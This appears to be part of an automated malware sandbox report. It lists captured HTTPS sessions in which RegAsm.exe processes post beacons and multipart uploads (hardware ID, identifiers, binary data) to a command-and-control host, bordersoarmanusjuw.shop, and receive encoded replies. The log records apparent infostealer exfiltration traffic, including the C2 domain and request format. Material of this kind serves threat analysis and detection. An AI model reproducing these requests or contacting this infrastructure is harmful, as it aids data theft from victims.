                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 46 31 44 72 76 4c 54 49 44 44 6f 35 68 36 4f 77 44 74 76 74 46 71 52 7a 69 64 39 34 32 42 68 45 58 4f 66 43 63 62 51 74 30 46 51 79 55 38 44 54 35 5a 6f 55 49 43 75 56 76 2b 74 51 6a 62 35 4b 7a 77 71 45 6c 78 4f 6c 41 6d 73 4a 73 71 4e 71 2f 33 6d 66 43 58 63 46 6c 5a 6d 6f 67 31 68 31 5a 74 37 47 32 30 69 50 73 30 72 4c 44 6f 66 52 58 74 74 71 52 33 65 44 77 6a 2b 32 54 4e 4a 4f 50 41 54 6c 30 4d 37 6a 46 47 41 70 6a 62 71 6c 61 49 2b 7a 53 73 73 4f 68 39 77 78 76 67 6f 67 4f 6f 4f 4a 4a 37 6f 64 2b 57 30 38 50 65 76 67 35 39 67 61 45 41 4b 2b 75 4f 46 4d 7a 4f 55 47 6e 45 72 4e 78 45 50 6b 55 58 35 66 35 35 30 70 6e 42 36 4c 62 68 64 51 36 36 37 6c 30 42 59 71 4a 37 32 54 6a 68 32 65 2f 52 79 4f 57 4e 47 53 41 71 45 48 4c 79 47 50 78 56 6e 4b 56 6f 55
                                                                                                                                            Data Ascii: F1DrvLTIDDo5h6OwDtvtFqRzid942BhEXOfCcbQt0FQyU8DT5ZoUICuVv+tQjb5KzwqElxOlAmsJsqNq/3mfCXcFlZmog1h1Zt7G20iPs0rLDofRXttqR3eDwj+2TNJOPATl0M7jFGApjbqlaI+zSssOh9wxvgogOoOJJ7od+W08Pevg59gaEAK+uOFMzOUGnErNxEPkUX5f550pnB6LbhdQ667l0BYqJ72Tjh2e/RyOWNGSAqEHLyGPxVnKVoU


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.449747172.67.189.664435900C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:22 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 49
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:22 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
                                                                                                                                            2024-04-21 13:31:22 UTC818INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:22 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=896g04hsi9icum6o9m389lbmt0; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=44m7Yc7%2FbsZJGoFmlnI5tPpXtIEE2v%2FCsDStkxJT4PDAEuFhlOuICqDSN849e%2B1YKe9fkJxU1pxXJxgA1ClcX8UBYdisdM0nDI%2Bd4e8e52NY6%2BK1JqDJLTV0Xvtlhs4m4b%2BZoS55uIl9bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbea992fadd5-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:22 UTC551INData Raw: 33 39 65 63 0d 0a 77 48 38 2b 74 75 6c 49 72 6c 36 4d 44 35 34 69 77 72 6e 2f 4d 4e 35 75 6d 67 7a 65 59 67 74 74 59 6e 4c 47 33 33 6d 72 48 43 65 37 64 54 65 55 6e 32 71 55 66 72 67 6a 6c 43 76 67 79 70 6f 53 35 45 37 75 66 71 73 48 4a 32 64 72 55 4b 65 37 57 35 45 38 51 61 45 54 54 64 50 46 51 71 64 38 34 58 65 38 47 4f 4c 69 39 54 6d 6c 5a 4a 4d 46 2f 41 64 6c 54 31 68 53 35 4b 67 63 79 58 6c 66 74 42 70 51 78 59 41 6e 77 42 37 68 61 75 70 44 72 39 69 4d 57 2f 41 48 39 53 37 79 61 41 4a 6b 51 42 65 38 2f 55 4f 4c 50 6d 71 6c 43 31 2f 37 69 44 76 46 66 4b 41 46 6c 79 76 67 33 49 73 53 35 45 36 34 55 50 77 53 61 68 38 44 48 37 57 44 57 35 46 6e 65 2b 49 57 53 74 4f 62 4b 64 6f 33 34 32 48 74 66 75 43 44 79 51 44 75 58 71 6f 38 6f 30 41 42 5a 42 39 34 7a
                                                                                                                                            Data Ascii: 39ecwH8+tulIrl6MD54iwrn/MN5umgzeYgttYnLG33mrHCe7dTeUn2qUfrgjlCvgypoS5E7ufqsHJ2drUKe7W5E8QaETTdPFQqd84Xe8GOLi9TmlZJMF/AdlT1hS5KgcyXlftBpQxYAnwB7haupDr9iMW/AH9S7yaAJkQBe8/UOLPmqlC1/7iDvFfKAFlyvg3IsS5E64UPwSah8DH7WDW5Fne+IWStObKdo342HtfuCDyQDuXqo8o0ABZB94z
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 48 75 39 31 58 43 69 50 6b 4b 75 58 51 53 57 79 79 7a 43 50 65 4e 74 37 6b 69 72 30 4a 68 41 74 77 58 31 59 37 77 4e 59 77 41 44 45 4b 4f 33 45 63 5a 30 51 61 38 51 57 74 53 4c 61 6f 4a 55 68 51 61 38 52 37 69 62 78 52 44 38 4c 2f 31 2b 75 77 78 2f 54 54 70 51 7a 4e 59 45 68 78 55 48 34 48 55 33 7a 65 4e 42 70 33 7a 70 59 62 77 59 34 70 75 56 56 37 38 50 38 32 47 2f 43 47 49 64 41 41 4b 69 73 42 37 62 65 45 43 73 46 31 2f 47 67 53 54 4b 50 2b 64 6d 39 55 57 6e 33 39 30 63 31 47 65 54 4c 72 73 59 4b 56 64 43 55 49 57 77 45 4d 56 30 55 71 4a 64 4e 4c 2b 55 5a 4b 52 58 39 77 57 58 4b 2b 44 63 6b 52 4c 6b 54 72 68 71 76 51 52 6f 43 77 34 65 6f 4c 45 64 78 33 4e 4b 70 42 64 63 30 34 45 69 78 44 33 6a 5a 76 4e 41 70 64 61 5a 56 4c 41 4e 2f 53 37 79 61 41 4a 6b
                                                                                                                                            Data Ascii: Hu91XCiPkKuXQSWyyzCPeNt7kir0JhAtwX1Y7wNYwADEKO3EcZ0Qa8QWtSLaoJUhQa8R7ibxRD8L/1+uwx/TTpQzNYEhxUH4HU3zeNBp3zpYbwY4puVV78P82G/CGIdAAKisB7beECsF1/GgSTKP+dm9UWn390c1GeTLrsYKVdCUIWwEMV0UqJdNL+UZKRX9wWXK+DckRLkTrhqvQRoCw4eoLEdx3NKpBdc04EixD3jZvNApdaZVLAN/S7yaAJk
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 34 58 78 48 64 41 72 51 39 57 32 49 6f 34 79 7a 58 6e 5a 2f 31 4f 72 39 43 52 56 36 34 48 39 32 61 7a 41 57 51 43 43 78 53 6b 2f 56 57 68 46 53 37 69 47 6b 53 55 30 32 69 4d 48 65 4e 69 37 6b 4f 78 6d 61 68 52 73 67 4c 2f 65 50 78 6f 41 68 42 4f 65 4d 2b 6b 63 36 49 56 42 61 55 52 48 49 7a 4a 61 73 30 77 34 6d 7a 7a 52 71 72 54 6e 6c 4f 75 42 66 64 6d 73 77 6c 6f 44 41 51 52 72 71 38 4a 79 58 4a 58 72 68 64 61 32 34 59 6d 6a 48 4b 47 42 70 63 41 70 38 50 64 43 76 35 4d 30 6d 32 6f 41 32 4e 4e 4e 52 4f 71 73 78 7a 66 50 69 33 4a 41 68 4b 38 34 44 4f 6b 56 34 55 74 2b 30 7a 67 67 39 38 53 73 51 33 77 61 4b 34 50 5a 41 77 4f 48 71 75 34 46 4d 46 2b 52 61 38 59 57 4e 2b 41 4b 63 45 34 2f 47 66 38 53 4b 58 61 6c 31 6a 38 51 70 41 46 31 30 42 75 46 30 42 49 35
                                                                                                                                            Data Ascii: 4XxHdArQ9W2Io4yzXnZ/1Or9CRV64H92azAWQCCxSk/VWhFS7iGkSU02iMHeNi7kOxmahRsgL/ePxoAhBOeM+kc6IVBaURHIzJas0w4mzzRqrTnlOuBfdmswloDAQRrq8JyXJXrhda24YmjHKGBpcAp8PdCv5M0m2oA2NNNROqsxzfPi3JAhK84DOkV4Ut+0zgg98SsQ3waK4PZAwOHqu4FMF+Ra8YWN+AKcE4/Gf8SKXal1j8QpAF10BuF0BI5
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 73 54 61 51 61 55 4e 79 4f 4a 63 6f 35 34 32 72 33 51 37 4c 4a 6e 6c 61 79 41 4c 67 67 31 47 73 43 54 77 63 49 35 4f 56 5a 69 56 74 53 6f 51 31 61 31 38 74 43 70 79 4f 67 42 5a 64 5a 79 4c 44 32 45 72 73 41 75 44 62 2b 51 47 6b 42 44 42 75 6a 74 68 44 4e 65 6b 57 76 46 6c 4c 61 67 69 62 45 4d 4f 6c 2f 38 55 57 6f 30 5a 52 58 73 41 48 37 66 4c 38 42 4b 55 46 6f 65 38 2f 39 48 4e 45 2b 48 65 42 64 65 2b 65 38 43 59 78 55 68 58 4b 79 4b 4d 76 43 39 54 6e 58 54 50 39 69 2f 46 67 72 54 77 45 59 6f 37 4d 66 32 33 42 58 72 42 70 63 30 6f 4d 69 79 7a 44 67 59 2b 35 49 6f 64 75 54 58 62 51 46 2f 47 2b 34 42 47 55 49 51 46 37 4d 31 6e 43 4a 65 56 33 69 52 52 36 55 6f 79 6e 57 4a 71 78 44 39 30 43 6e 79 34 74 4a 2f 47 53 54 63 66 4a 6f 41 68 5a 6f 65 38 2f 39 48 4d
                                                                                                                                            Data Ascii: sTaQaUNyOJco542r3Q7LJnlayALgg1GsCTwcI5OVZiVtSoQ1a18tCpyOgBZdZyLD2ErsAuDb+QGkBDBujthDNekWvFlLagibEMOl/8UWo0ZRXsAH7fL8BKUFoe8/9HNE+HeBde+e8CYxUhXKyKMvC9TnXTP9i/FgrTwEYo7Mf23BXrBpc0oMiyzDgY+5IoduTXbQF/G+4BGUIQF7M1nCJeV3iRR6UoynWJqxD90Cny4tJ/GSTcfJoAhZoe8/9HM
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 46 6c 50 59 68 53 62 48 4e 2b 56 75 39 6b 6d 6a 31 35 74 54 73 67 7a 32 62 76 78 4f 41 57 52 72 55 4b 4f 6c 57 35 45 38 42 59 49 57 53 73 47 49 4f 73 6f 37 34 69 32 55 4b 37 2b 56 39 54 6d 6c 5a 4a 4d 46 2f 41 64 6c 54 31 68 53 35 4c 4d 4a 7a 58 39 46 71 68 52 51 33 34 4d 34 79 7a 76 6c 59 2f 4a 4c 70 4e 65 55 57 62 55 4a 39 47 2b 33 43 57 77 4c 43 68 61 70 2f 56 57 68 46 53 37 69 47 6b 53 55 30 32 69 4d 45 4f 31 69 39 77 44 49 73 49 49 63 31 47 66 68 42 74 64 72 4b 51 67 4d 55 50 7a 2f 57 38 35 32 54 61 77 65 57 74 2b 48 4a 73 30 31 36 47 6a 30 52 36 2f 63 6c 46 57 38 43 75 70 70 73 51 6c 70 42 41 6b 61 6f 4c 77 51 69 54 41 74 79 58 59 63 30 35 4e 71 6c 48 36 75 58 2f 74 57 73 4e 6a 64 4f 74 63 54 74 67 58 55 61 33 42 6e 61 33 76 6b 75 68 65 4a 4a 67 66
                                                                                                                                            Data Ascii: FlPYhSbHN+Vu9kmj15tTsgz2bvxOAWRrUKOlW5E8BYIWSsGIOso74i2UK7+V9TmlZJMF/AdlT1hS5LMJzX9FqhRQ34M4yzvlY/JLpNeUWbUJ9G+3CWwLChap/VWhFS7iGkSU02iMEO1i9wDIsIIc1GfhBtdrKQgMUPz/W852TaweWt+HJs016Gj0R6/clFW8CuppsQlpBAkaoLwQiTAtyXYc05NqlH6uX/tWsNjdOtcTtgXUa3Bna3vkuheJJgf
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 49 77 6d 6a 47 53 73 4c 66 31 4d 72 39 69 53 55 62 38 4e 38 6e 79 75 44 47 41 48 42 52 79 76 73 78 33 62 65 45 71 72 48 6c 2f 64 6a 43 4c 41 4e 75 31 71 76 41 37 49 73 50 59 53 75 78 53 34 4e 76 35 41 53 68 67 51 48 65 54 56 63 4e 59 77 4c 63 6b 45 4e 4c 2f 67 61 73 73 77 72 6a 57 2b 41 4b 6a 57 6c 56 69 34 43 2f 56 70 75 67 6c 37 42 67 55 65 70 4c 6b 51 78 6e 68 42 6f 52 31 4f 30 6f 38 69 7a 7a 48 6a 59 2f 39 45 34 4a 58 31 4f 64 64 4d 2f 33 62 38 57 43 74 50 4d 68 32 71 70 68 54 4f 62 30 2f 69 64 54 66 4c 78 55 4b 6e 4a 59 59 47 6c 77 43 6e 31 39 30 4b 2f 6b 7a 38 59 4b 34 4c 61 41 51 4c 48 71 4f 79 48 73 4e 2b 53 71 59 65 55 74 2b 4b 4b 63 51 78 34 32 50 32 53 61 6e 63 6b 56 61 37 54 4c 59 47 31 32 73 70 43 42 68 51 2f 50 39 62 34 6c 39 6f 6a 68 70 47
                                                                                                                                            Data Ascii: IwmjGSsLf1Mr9iSUb8N8nyuDGAHBRyvsx3beEqrHl/djCLANu1qvA7IsPYSuxS4Nv5AShgQHeTVcNYwLckENL/gasswrjW+AKjWlVi4C/Vpugl7BgUepLkQxnhBoR1O0o8izzHjY/9E4JX1OddM/3b8WCtPMh2qphTOb0/idTfLxUKnJYYGlwCn190K/kz8YK4LaAQLHqOyHsN+SqYeUt+KKcQx42P2SanckVa7TLYG12spCBhQ/P9b4l9ojhpG
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 73 71 35 47 72 77 56 71 76 61 6e 6b 53 78 48 4c 67 47 31 78 38 6e 5a 32 73 4a 7a 4e 5a 77 69 58 6c 4a 34 6b 55 65 6c 49 30 6a 79 6a 76 6f 59 2b 35 46 70 74 53 53 57 37 55 49 38 47 32 38 42 47 30 49 42 52 4f 6f 74 68 7a 4b 63 55 47 72 45 31 58 62 79 32 53 6b 56 34 55 74 2b 31 6a 67 67 39 38 53 6e 52 66 37 59 72 46 41 41 57 51 66 58 73 7a 57 41 71 45 56 4c 75 49 61 55 4a 54 54 61 49 77 77 34 47 6a 38 53 71 62 66 6d 46 53 32 43 66 68 6c 76 77 39 74 43 51 51 66 70 4c 59 53 79 48 68 41 71 42 5a 61 32 59 67 73 79 6e 79 67 42 5a 63 72 34 4e 79 46 45 75 52 4f 75 45 36 6e 44 57 55 49 51 48 6a 50 6f 6c 57 68 46 56 7a 4b 64 6a 65 55 6a 43 61 4d 5a 4b 77 74 39 30 79 6b 33 4a 31 66 76 77 54 39 61 72 59 46 61 51 63 53 47 4b 53 36 43 64 74 2b 54 4b 63 52 58 39 53 50 4c
                                                                                                                                            Data Ascii: sq5GrwVqvankSxHLgG1x8nZ2sJzNZwiXlJ4kUelI0jyjvoY+5FptSSW7UI8G28BG0IBROothzKcUGrE1Xby2SkV4Ut+1jgg98SnRf7YrFAAWQfXszWAqEVLuIaUJTTaIww4Gj8SqbfmFS2Cfhlvw9tCQQfpLYSyHhAqBZa2YgsynygBZcr4NyFEuROuE6nDWUIQHjPolWhFVzKdjeUjCaMZKwt90yk3J1fvwT9arYFaQcSGKS6Cdt+TKcRX9SPL
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 47 6c 33 2f 75 73 2f 59 35 2f 42 53 34 4e 76 35 41 58 41 77 4f 48 71 4f 72 43 6f 52 5a 53 36 55 63 53 73 53 63 4a 59 78 79 68 67 61 58 41 4b 61 62 78 52 44 76 51 70 41 46 31 30 42 74 48 6b 42 49 35 75 31 4a 6b 69 73 57 39 55 30 4f 76 4f 41 31 67 6c 53 46 64 4a 51 72 79 35 75 4c 45 75 52 4f 71 69 44 55 61 77 4a 50 45 6c 44 38 2f 31 75 4f 66 56 65 77 47 31 2f 43 69 47 33 79 41 73 6c 37 39 6b 65 77 33 49 70 64 2f 45 4b 51 42 64 64 41 5a 6b 39 59 55 70 33 56 63 4b 49 56 42 61 73 61 52 38 57 64 4a 39 77 37 72 67 57 58 4b 35 2b 56 39 54 6e 58 54 4f 41 75 35 45 49 70 4f 67 4d 65 71 72 6f 4e 32 44 4e 69 74 42 64 62 78 49 77 39 77 33 79 67 42 5a 63 72 34 4e 33 64 43 76 35 66 74 67 62 58 61 79 6b 4c 45 56 44 38 2f 30 75 62 4a 52 44 78 53 67 79 47 34 30 48 54 63 6f
                                                                                                                                            Data Ascii: Gl3/us/Y5/BS4Nv5AXAwOHqOrCoRZS6UcSsScJYxyhgaXAKabxRDvQpAF10BtHkBI5u1JkisW9U0OvOA1glSFdJQry5uLEuROqiDUawJPElD8/1uOfVewG1/CiG3yAsl79kew3Ipd/EKQBddAZk9YUp3VcKIVBasaR8WdJ9w7rgWXK5+V9TnXTOAu5EIpOgMeqroN2DNitBdbxIw9w3ygBZcr4N3dCv5ftgbXaykLEVD8/0ubJRDxSgyG40HTco
                                                                                                                                            2024-04-21 13:31:22 UTC1369INData Raw: 79 4c 44 32 45 72 4e 4d 6f 43 79 46 51 47 6f 64 45 6c 2b 31 71 78 62 5a 65 51 6d 71 44 46 48 59 79 32 53 4f 66 4b 4a 70 39 30 79 6c 33 49 30 64 72 68 7a 7a 59 71 70 4d 62 52 31 41 58 75 62 39 43 73 4a 78 56 36 77 61 45 38 57 64 4a 39 77 2f 36 32 71 77 53 4c 48 57 6b 52 4c 79 54 72 68 37 74 77 78 76 41 68 56 66 74 61 73 59 33 33 6b 4a 71 67 78 52 32 4d 73 56 67 6c 53 46 42 72 78 59 34 49 50 66 45 6f 6b 50 39 6d 43 37 46 6e 68 43 49 42 75 6f 76 68 66 49 65 51 58 73 64 54 65 2f 79 79 79 4d 5a 4b 77 2b 73 69 6a 4c 73 4e 31 57 72 55 79 67 4c 4f 78 53 4d 6c 70 54 52 2f 54 76 63 36 4a 68 43 38 70 32 52 62 7a 67 51 59 77 71 72 6a 57 2b 45 75 36 7a 39 6a 6e 38 48 72 67 32 2f 6b 41 75 44 42 49 43 6f 72 34 4e 79 6a 6c 37 6e 42 78 52 32 38 63 6b 78 7a 7a 70 66 65 70
                                                                                                                                            Data Ascii: yLD2ErNMoCyFQGodEl+1qxbZeQmqDFHYy2SOfKJp90yl3I0drhzzYqpMbR1AXub9CsJxV6waE8WdJ9w/62qwSLHWkRLyTrh7twxvAhVftasY33kJqgxR2MsVglSFBrxY4IPfEokP9mC7FnhCIBuovhfIeQXsdTe/yyyMZKw+sijLsN1WrUygLOxSMlpTR/Tvc6JhC8p2RbzgQYwqrjW+Eu6z9jn8Hrg2/kAuDBICor4Nyjl7nBxR28ckxzzpfep


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.449748172.67.189.664431740C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:22 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 18158
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:22 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:22 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                                                                                            Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                                                                                            2024-04-21 13:31:23 UTC816INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:23 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=oqonkosndarkuqd3gveibj9vba; expires=Thu, 15-Aug-2024 07:18:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h7JrzjxFa5a7k1rwqefX%2FBlV8vFEmxGk0Jra2jYL9xOYkAF3e%2Fap3OB%2F4SkT6TY%2F2RKtVfk2QH5e60P622vCIydFG1ox98oyyrvT60rj9eNg4pA%2FSqxHwcGbeyc1p0IxCCVKAFU9HlpOeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbbea2b24b066-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.449749172.67.189.664435856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:23 UTC289OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 18158
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:23 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:23 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                                                                                            Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                                                                                            2024-04-21 13:31:23 UTC818INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:23 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=7vefi2hs9vak532h1umpolfu37; expires=Thu, 15-Aug-2024 07:18:02 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
